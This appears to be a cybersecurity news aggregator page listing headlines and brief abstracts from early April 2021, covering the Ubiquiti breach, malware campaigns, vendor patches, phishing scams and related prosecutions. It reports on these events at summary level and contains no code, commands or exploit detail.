Shares of New York City-based IoT device maker Ubiquiti (NYSE: UI) fell significantly this week following a report claiming that the recently disclosed data breach was “catastrophic” and that its impact was downplayed.Security Week
April 2, 2021 – Government
After Hack, Officials Draw Attention to Supply Chain Threats Full Text
Abstract
The U.S. government is working to draw attention to supply chain vulnerabilities, an issue that received particular attention late last year after suspected Russian hackers gained access to federal agencies and private corporations.Security Week
April 02, 2021 – Breach
GitHub Arctic Vault captures leaked patient medical data for 1,000 years Full Text
Abstract
GitHub Arctic Code Vault has inadvertently captured sensitive patient medical records from multiple healthcare facilities. The private data was leaked on GitHub repositories last year that are now part of a collection of open-source contributions bound to last a 1,000 years.BleepingComputer
April 2, 2021 – Business
Cybersecurity Firm ReliaQuest Announces New Senior Appointments Full Text
Abstract
Kara Wilson and Alex Bender both join the companyInfosecurity Magazine
April 2, 2021 – Policy and Law
Man indicted for tampering with public water system in Kansas Full Text
Abstract
The United States Department of Justice (DoJ) charged a Kansas man, for accessing and tampering with a public water system. The United States Department of Justice charged Wyatt A. Travnichek (22), of Ellsworth County, Kansas, for accessing and tampering...Security Affairs
April 2, 2021 – Breach
Mobile providers exposing sensitive data to leakage and theft Full Text
Abstract
Data exposure is a significant, unaddressed problem for Europe’s top mobile providers and, by extension, more than 253 million customers who sign up for their services and share sensitive personal data, according to research by Tala Security.Help Net Security
April 2, 2021 – Business
Wipro acquires Ampion to deliver combined portfolio of transformation offerings Full Text
Abstract
Wipro announced that it has signed an agreement to acquire Ampion, an Australia-based provider of cybersecurity, DevOps, and quality engineering services. Ampion was formed through the merger of IT services providers ‘Revolution IT’ and ‘Shelde’.Help Net Security
April 02, 2021 – Phishing
MacKenzie Scott Grant scam more widespread than initially thought Full Text
Abstract
A massive phishing campaign reaching tens of thousands of inboxes impersonated the MacKenzie Bezos-Scott grant foundation promising financial benefits to recipients in exchange of a processing fee.BleepingComputer
April 2, 2021 – Hacker
Recent Hancitor Infections Use Cobalt Strike and a Network Ping Tool Full Text
Abstract
As early as October 2020, Hancitor began utilizing Cobalt Strike and some of these infections utilized a network ping tool to enumerate the infected host’s internal network.Palo Alto Networks
April 2, 2021 – Business
Molson Coors Cyberattack, Storms Could Cost Company $140 Million Full Text
Abstract
Known brewing giant Molson Coors said that a disruptive cyberattack, combined with winter storms in Texas, could cost the company upwards of $140 million in short-term EBITDA.Security Week
April 2, 2021 – Hacker
Bahamut Possibly Responsible for Multi-Stage Infection Chain Campaign Full Text
Abstract
Threat researchers discovered cyberthreat actors distributing malicious documents exploiting a vulnerability (CVE-2017-8570) during a multi-stage infection chain to install a Visual Basic (VB) executable on target machines.Anomali
April 2, 2021 – Malware
Beware – Hackers Using Gaming mods and Cheat Engines to Deliver Malware Full Text
Abstract
Cisco Talos recently revealed a new campaign targeting video game players and other PC modders. They detected a new cryptor used in...Cyber Security News
April 01, 2021 – Phishing
US DOJ: Phishing attacks use vaccine surveys to steal personal info Full Text
Abstract
The US Department of Justice warns of phishing attacks using fake post-vaccine surveys to steal money from people or tricking them into handing over their personal information.BleepingComputer
April 1, 2021 – Malware
Fileless Malware Growth Beats All Other Odds in 2020 Full Text
Abstract
According to a report by Watchguard Technologies, in 2020, the use of fileless malware increased rapidly as cybercriminals tried to find new ways to evade traditional security controls.Cyware Alerts - Hacker News
April 01, 2021 – General
Hillicon Valley: Supreme Court rules Facebook text alerts not akin to robocalls | Republicans press Google, Apple, Amazon on Parler removals | Texas Senate blocks social media platforms from banning users based on politics Full Text
Abstract
The Supreme Court issued an unanimous ruling Thursday siding with Facebook over the platform’s notification system to alert users of suspicious logins. Meanwhile, Google, Apple and Amazon received letters from two Republicans questioning the companies’ actions taken against the social media platform Parler. Top tech platforms were also the target of a Texas Senate bill that passed Thursday that aims to block social media platforms from banning residents based on political views.The Hill
April 1, 2021 – Privacy
ACLU Files AI FOIA Request Full Text
Abstract
American Civil Liberties Union requests artificial intelligence documents from national security agenciesInfosecurity Magazine
April 1, 2021 – Vulnerabilities
VMware fixes authentication bypass in Carbon Black Cloud Workload appliance Full Text
Abstract
VMware has addressed a critical authentication bypass vulnerability in the VMware Carbon Black Cloud Workload appliance. VMware has addressed a critical vulnerability, tracked as CVE-2021-21982, in the VMware Carbon Black Cloud Workload appliance...Security Affairs
April 1, 2021 – Phishing
Protecting employees from job offer scams can lead to awkward but important conversations Full Text
Abstract
Employees who are successfully phished with a job offer likely won’t report the incident to their employer, expert says.SCMagazine
April 1, 2021 – General
80% of Global Enterprises Report Firmware Cyberattacks Full Text
Abstract
A vast majority of companies in a global survey from Microsoft report being a victim of a firmware-focused cyberattack, but defense spending lags, but defense spending lags.Threatpost
April 01, 2021 – General
Coinhive domain repurposed to warn visitors of hacked sites, routers Full Text
Abstract
After taking over the domains for the notorious Coinhive in-browsing Monero mining service, a researcher is now displaying alerts on hacked websites that are still injecting the mining service's JavaScript.BleepingComputer
April 1, 2021 – Ransomware
Hades Ransomware and Hafnium Hacker Group - Peas from the Same Pod? Full Text
Abstract
Researchers surmise that the Hafnium APT group might be operating under the disguise of Hades due to shared IOCs observed in recent attacks.Cyware Alerts - Hacker News
April 1, 2021 – Breach
Forensic Audit of MobiKwik Ordered Full Text
Abstract
Reserve Bank of India orders audit of country's largest mobile payment network after alleged data breachInfosecurity Magazine
April 1, 2021 12 – Malware
Video game cheat mod malware demonstrates risks of unlicensed software Full Text
Abstract
Hacking campaign trojanizes cheat mods that PC gamers may be downloading and installing on their work computers.SCMagazine
April 01, 2021 – Vulnerabilities
VMware fixes authentication bypass in data center security software Full Text
Abstract
VMware has addressed a critical vulnerability in the VMware Carbon Black Cloud Workload appliance that could allow attackers to bypass authentication after exploiting vulnerable servers.BleepingComputer
April 1, 2021 – General
A Barrage of Cyberattacks Hits the Financial Sector Full Text
Abstract
Most of these attacks were observed in the U.S.-based financial institutions, while other impacted regions include Western Asia, Central, and Western Europe. Phishing is still a major infection vector.Cyware Alerts - Hacker News
April 1, 2021 – Government
CISA encourages everyone to follow updated guidance for Microsoft Exchange fixes Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday issued a supplemental direction to Emergency Directive (ED) 21-02, which lays out hardening, forensic triage and reporting requirements designed to mitigate vulnerabilities found in the wake of the massive Microsoft Exchange vulnerability hacks that have affected tens of thousands of organizations. The update directs federal departments…SCMagazine
April 1, 2021 – Outage
Brown experiencing IT security threat, temporary system outage Full Text
Abstract
On Tuesday, the IT department sent a letter to the community saying they “became aware of a cybersecurity threat to the University’s Microsoft Windows-based technology infrastructure.”WPRI
April 1, 2021 – Government
Just like cyber became a C-suite issue, it’s also now your governor’s concern Full Text
Abstract
The National Governors Association announced five U.S. states have been selected for its 2021 Policy Academy to Advance Whole-of-State Cybersecurity.SCMagazine
April 1, 2021 – Attack
Website of global parliamentary alliance on China suffers cyber attack Full Text
Abstract
The IPAC's website was down on Monday, after suffering a DDoS attack (distributed denial-of-service), causing the site to slow significantly, The Sydney Morning Herald reported.The Times Of India
April 01, 2021 – Breach
Ubiquiti confirms extortion attempt following security breach Full Text
Abstract
Networking device maker Ubiquiti has confirmed that it was the target of an extortion attempt following a January security breach, as revealed by a whistleblower earlier this week.BleepingComputer
April 1, 2021 – Covid-19
Don’t Share Your COVID-19 Vaccine Card on Social Media – US Govt Warns Full Text
Abstract
The Department of Health and Human Services, Office of Inspector General (HHS-OIG), and the FBI are advising the public to be aware...Cyber Security News
April 1, 2021 – Malware
Activision Reveals Malware Disguised as ‘Call of Duty: Warzone’ Cheats Full Text
Abstract
Activision security researchers found that a Warzone cheat advertised on popular cheating forums was actually malware that let hackers take control of the victims' computers.Motherboard Vice
April 01, 2021 – Policy and Law
DeepDotWeb Admin Pleads Guilty to Money Laundering Charges Full Text
Abstract
The U.S. Department of Justice (DoJ) on Wednesday said that an Israeli national pleaded guilty for his role as an "administrator" of a portal called DeepDotWeb ( DDW ), a "news" website that "served as a gateway to numerous dark web marketplaces." According to the unsealed court documents, Tal Prihar , 37, an Israeli citizen residing in Brazil, operated DDW alongside Michael Phan , 34, of Israel, starting October 2013, in return for which they received kickbacks from the operators of the marketplaces in the form of virtual currency amounting to 8,155 bitcoins (worth $8.4 million at the time of the transactions). In an attempt to conceal the illicit payments, Prihar is said to have transferred the money to other bitcoin accounts and to bank accounts under his control in the name of shell companies. "Tal Prihar served as a broker for illegal Darknet marketplaces — helping such marketplaces find customers for fentanyl, firearms, and other dangerousThe Hacker News
April 1, 2021 – Policy and Law
DeepDotWeb Administrator Admits Darknet Conspiracy Full Text
Abstract
Website owner made over $8m advertising illegal online marketplacesInfosecurity Magazine
April 1, 2021 – Policy and Law
DeepDotWeb admin pleads guilty to money laundering conspiracy Full Text
Abstract
One of the administrators for the DeepDotWeb dark web portal pleads guilty to receiving kickbacks from the operators of the marketplaces. One of the administrators for the DeepDotWeb dark web portal, Tal Prihar (37), pleads guilty to receiving kickbacks...Security Affairs
April 1, 2021 – Education
Building a Fortress: 3 Key Strategies for Optimized IT Security Full Text
Abstract
Chris Haas, director of information security and research at Automox, discusses how to shore up cybersecurity defenses and what to prioritize.Threatpost
April 01, 2021 – Breach
Ubiquiti cyberattack may be far worse than originally disclosed Full Text
Abstract
The data breach report from Ubiquiti in January is allegedly a cover-up of a massive incident that put at risk customer data and devices deployed on corporate and home networks.BleepingComputer
April 1, 2021 – Government
DHS Secretary Mayorkas Outlines His Vision for Cybersecurity Resilience Full Text
Abstract
The department will conduct a series of 60-day sprints which will mobilize action by elevating existing efforts, removing roadblocks, and launching new initiatives where necessary.DHS
April 01, 2021 – Policy and Law
22-Year-Old Charged With Hacking Water System and Endangering Lives Full Text
Abstract
A 22-year-old man from the U.S. state of Kansas has been indicted on charges that he unauthorizedly accessed a public water facility's computer system, jeopardizing the residents' safety and health in the local community. Wyatt A. Travnichek, 22, of Ellsworth County, Kansas, has been charged with one count of tampering with a public water system and one count of reckless damage to a protected computer during unauthorized access, according to the Department of Justice (DoJ). "By illegally tampering with a public drinking water system, the defendant threatened the safety and health of an entire community," said Lance Ehrig, Special Agent in Charge of the Environmental Protection Agency (EPA) Criminal Investigation Division in Kansas. "EPA and its law enforcement partners are committed to upholding the laws designed to protect our drinking water systems from harm or threat of harm. Today's indictment sends a clear message that individuals who intentionallThe Hacker News
April 1, 2021 – Government
DHS Secretary Outlines Biden Administration’s Cybersecurity Vision Full Text
Abstract
DHS secretary Alejandro Mayorkas spoke during RSAC webcastInfosecurity Magazine
April 1, 2021 – Vulnerabilities
VMware fixed flaws in vROps that can be chained to compromise organizations Full Text
Abstract
VMware addressed two vulnerabilities in its vRealize Operations (vROps) product that can expose organizations to a significant risk of attacks The vROps delivers self-driving IT operations management for private, hybrid, and multi-cloud environments...Security Affairs
April 1, 2021 – General
USB threats to ICS systems have nearly doubled: Report Full Text
Abstract
The latest Honeywell USB Threat Report 2020 indicates that the number of threats specifically targeting Operational Technology systems has nearly doubled from 16% to 28%.Tripwire
April 01, 2021 – Education
How to Vaccinate Against the Poor Password Policy Pandemic Full Text
Abstract
Data breaches remain a constant threat, and no industry or organization is immune from the risks. From Fortune 500 companies to startups, password-related breaches continue to spread seemingly unchecked. As a result of the volume of data breaches and cybersecurity incidents, hackers now have access to a vast swathe of credentials that they can use to power various password-related attacks. One example of this is credential stuffing attacks, which accounted for 1.5 billion incidents in the last quarter of 2020—a staggering 90% increase from Q1 2020. The rapid pivot to digital in response to the pandemic has been a key contributor to the explosive growth in cybersecurity attacks. With organizations shifting more services online and investing in new applications that facilitate virtual interactions with employees and customers, this has changed the security landscape and presented an array of new avenues for hackers to exploit. However, in a rush to move everything online from meeThe Hacker News
April 1, 2021 – Policy and Law
Booking.com Fined $558,000 for Late Breach Notification Full Text
Abstract
Dutch regulator brands 2018 incident a “serious violation”Infosecurity Magazine
April 1, 2021 – Ransomware
Akamai dealt with an 800Gbps ransom DDoS against a gambling company Full Text
Abstract
Akamai has recently involved in the mitigation of two of the largest known ransom DDoS attacks, one of them peaked at 800Gbps. CDN and cybersecurity firm Akamai warns of a worrying escalation in ransom DDoS attacks since the beginning of the year. The...Security Affairs
April 1, 2021 – Breach
Multiple Healthcare Providers Report Patient Data Breaches in Wake of Netgain Security Incident Full Text
Abstract
Months after an apparent ransomware attack against cloud hosting and MSP Netgain Technology, the list of healthcare entities reporting major health data breaches linked to the incident is growing.Info Risk Today
April 01, 2021 – Vulnerabilities
Hackers Using a Windows OS Feature to Evade Firewall and Gain Persistence Full Text
Abstract
A novel technique adopted by attackers finds ways to use Microsoft's Background Intelligent Transfer Service (BITS) so as to deploy malicious payloads on Windows machines stealthily. In 2020, hospitals, retirement communities, and medical centers bore the brunt of an ever-shifting phishing campaign that distributed custom backdoors such as KEGTAP, which ultimately paved the way for RYUK ransomware attacks. But new research by FireEye's Mandiant cyber forensics arm has now revealed a previously unknown persistence mechanism that shows the adversaries made use of BITS to launch the backdoor. Introduced in Windows XP, BITS is a component of Microsoft Windows, which makes use of idle network bandwidth to facilitate the asynchronous transfer of files between machines. This is achieved by creating a job — a container that includes the files to download or upload. BITS is commonly used to deliver operating system updates to clients as well as by Windows Defender antivirusThe Hacker News
April 1, 2021 – Hacker
North Korean Hackers Expand Targeting of Security Community Full Text
Abstract
New fake company and social profiles seek to lure researchersInfosecurity Magazine
April 1, 2021 – Breach
Ubiquiti security breach may be a catastrophe Full Text
Abstract
The data breach disclosed by Ubiquiti in January could be just the tip of the iceberg, a deeper incident could have hit the company. In January, American technology vendor Ubiquiti Networks suffered a data breach, it sent out notification emails to its customers...Security Affairs
April 1, 2021 – Phishing
Over 1,600 Fake Twitter Accounts Being Used to Impersonate Major Indonesian Banks Full Text
Abstract
The scam campaign involving over 1600 fake Twitter accounts, targets over 2 million Indonesian bank customers, which corresponds to the number of legitimate bank Twitter pages’ followers.Security Affairs
April 1, 2021 – General
Half of Global Retailers See Account Takeovers Surge Full Text
Abstract
Ravelin study finds most are increasing fraud budgets this yearInfosecurity Magazine
April 1, 2021 – Vulnerabilities
US CISA warns of DoS flaws in Citrix Hypervisor Full Text
Abstract
Citrix addressed vulnerabilities in Hypervisor that could be exploited by threat actors to execute code in a virtual machine to trigger a denial of service condition on the host. US CISA warns that Citrix has released security updates to address flaws...Security Affairs
April 1, 2021 – Solution
Google Cloud And Deloitte Launch Security Analytics Platform Full Text
Abstract
Google Cloud and Deloitte have launched a new platform for enterprises aimed at helping companies thwart cyberthreats as the global workforce has gone remote and cloud usage has exploded.CRN
April 1, 2021 – General
#LORCALive: Cybersecurity to Play a Key Role in Supporting Growing Space Sector Full Text
Abstract
As the commercial use of space grows, the sector will come under increased threat of attacksInfosecurity Magazine
April 1, 2021 – Hacker
Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service Full Text
Abstract
When malicious applications create BITS jobs, files are downloaded or uploaded in the context of the service host process. This can be used to bypass firewalls that block unknown processes.FireEye
April 1, 2021 – Vulnerabilities
Chinese Researchers Earn Another $20,000 for Chrome Sandbox Escape Full Text
Abstract
Tracked as CVE-2021-21194, it can be exploited to escape the Chrome sandbox. In combination with a renderer bug, it can allow an attacker to remotely execute arbitrary code outside the Chrome sandbox.Security Week